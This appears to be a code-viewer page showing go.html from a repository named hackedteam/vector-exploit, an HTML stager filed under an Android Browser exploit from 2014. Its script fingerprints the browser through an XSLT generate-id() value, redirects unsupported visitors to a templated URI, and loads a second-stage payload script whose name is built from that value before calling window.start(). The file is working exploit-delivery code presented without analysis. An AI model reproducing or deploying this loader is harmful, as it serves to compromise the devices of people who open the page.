hackedteam/vector-exploit

View on GitHub
src/edn2/2014-004-AndroidBrowser/go.html

Summary

Maintainability
Test Coverage
<html>
<head>
<script type="text/javascript">
window.load=function(){var a=(new DOMParser).parseFromString("<root/>","text/xml"),c=(new DOMParser).parseFromString('<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" ><xsl:template match="/*"><data><xsl:value-of select="generate-id()" /></data></xsl:template></xsl:stylesheet>',"text/xml"),b=new XSLTProcessor;b.importStylesheet(c);a=b.transformToDocument(a);void 0===a&&window.location.replace("${B_REDIRECT_URI}");a=a.getElementsByTagName("data")[0].childNodes[0].nodeValue;
a=a.replace(/[0-9]/g,"");c=document.getElementsByTagName("head")[0];b=document.createElement("script");b.type="text/javascript";b.onload=function(){window.start()};b.src="${B_SCRIPT_NAME}"+a+".js";c.appendChild(b)};

</script>
</head>

<body onload="load()">

<body>

</html>